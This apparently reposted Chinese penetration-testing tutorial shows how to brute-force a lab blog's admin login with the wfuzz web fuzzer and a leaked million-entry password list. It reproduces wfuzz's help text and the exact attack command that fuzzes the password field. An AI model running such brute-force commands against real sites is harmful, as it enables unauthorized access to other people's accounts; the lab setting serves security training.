50.网络安全渗透测试—[穷举篇13]—[wfuzz多线程百万密码测试指定后台破解]

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

我认为:无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、多线程百万密码测试指定后台破解

1、相关解释:

00 wfuzz:w是web,fuzz是模糊测试。

01 靶机后台登录页面:http://www.blogs.com/admin/index.php?action=login
    
    
02 百万密码字典 csdnpass.txt
    #注意:不可以使用Burp爆破,字典太大
    #这里,我们使用wfuzz爆破


03 wfuzz:kali里面的工具
    wfuzz --help
    
    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
    
    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    *                                                      *
    * Version up to 1.4c coded by:                         *
    * Christian Martorella (cmartorella@edge-security.com) *
    * Carlos del ojo (deepbit@gmail.com)                   *
    *                                                      *
    * Version 1.4d to 2.4.5 coded by:                      *
    * Xavier Mendez (xmendez@edge-security.com)            *
    ********************************************************
    
    Usage:    wfuzz [options] -z payload,params <url>
    
        FUZZ, ..., FUZnZ  wherever you put these keywords wfuzz will replace them with the values of the specified payload.
        FUZZ{ baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
    
    
    Options:
        -h/--help                 : This help
        --help                    : Advanced help
        --filter-help             : Filter language specification
        --version                 : Wfuzz version details
        -e <type>                 : List of available encoders/payloads/iterators/printers/scripts
        
        --recipe <filename>       : Reads options from a recipe. Repeat for various recipes.
        --dump-recipe <filename>  : Prints current options as a recipe
        --oF <filename>           : Saves fuzz results to a file. These can be consumed later using the wfuzz payload.
        
        -c                        : Output with colors
        -v                        : Verbose information.
        -f filename,printer       : Store results in the output file using the specified printer (raw printer if omitted).
        -o printer                : Show results using the specified printer.
        --interact                : (beta) If selected,all key presses are captured. This allows you to interact with the program.
        --dry-run                 : Print the results of applying the requests without actually making any HTTP request.
        --prev                    : Print the previous HTTP requests (only when using payloads generating fuzzresults)
        --efield <expr>           : Show the specified language expression together with the current payload
        --field <expr>            : Do not show the payload but only the specified language expression
        
        -p addr                   : Use Proxy in format ip:port:type. Repeat option for using various proxies.
                                    Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
        
        -t N                      : Specify the number of concurrent connections (10 default)
        -s N                      : Specify time delay between requests (0 default)
        -R depth                  : Recursive path discovery being depth the maximum recursion level.
        -L,--follow               : Follow HTTP redirections
        --ip host:port            : Specify an IP to connect to instead of the URL's host in the format ip:port
        -Z                        : Scan mode (Connection errors will be ignored).
        --req-delay N             : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
        --conn-delay N            : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.
        
        -A, --AA, --AAA           : Alias for --script=default,verbose,discovery -v -c
        --no-cache                : Disable plugins cache. Every request will be scanned.
        --script=                 : Equivalent to --script=default
        --script=<plugins>        : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
        --script-help=<plugins>   : Show help about scripts.
        --script-args n1=v1,...   : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"
        
        -u url                    : Specify a URL for the request.
        -m iterator               : Specify an iterator for combining payloads (product by default)
        -z payload                : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
                                    A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                                    Encoders category can be used. ie. url
                                    Use help as a payload to show payload plugin's details (you can filter using --slice)
        --zP <params>             : Arguments for the specified payload (it must be preceded by -z or -w).
        --zD <default>            : Default parameter for the specified payload (it must be preceded by -z or -w).
        --zE <encoder>            : Encoder for the specified payload (it must be preceded by -z or -w).
        --slice <filter>          : Filter payload's elements using the specified expression. It must be preceded by -z.
        -w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
        -V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
        -X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ
        
        -b cookie                 : Specify a cookie for the requests. Repeat option for various cookies.
        -d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
        -H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
        --basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
        
        --hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --ss/hs regex             : Show/hide responses with the specified regex within the content
        --filter <filter>         : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
        --prefilter <filter>      : Filter items before fuzzing using the specified expression.


04 wfuzz用法:
    wfuzz -c -z file,/pentest/csdnpass.txt --hc 200 -u http://www.blogs.com/admin/index.php?action=login -d "user=admin&pw=FUZZ" -v
    # 注意:FUZZ是密码变量


05 注意:
    /etc/hosts文件内容:192.168.97.131 www.blogs.com
    # 访问测试:curl www.blogs.com

2、示例:

(1)kali中运行:

wfuzz -c -z file,csdnpass.txt --hc 200 -u http://www.blogs.com/admin/index.php?action=login -d "user=admin&pw=FUZZ" -v
# 注意:FUZZ是密码变量

img (2)尝试登录: img

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/119429098
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复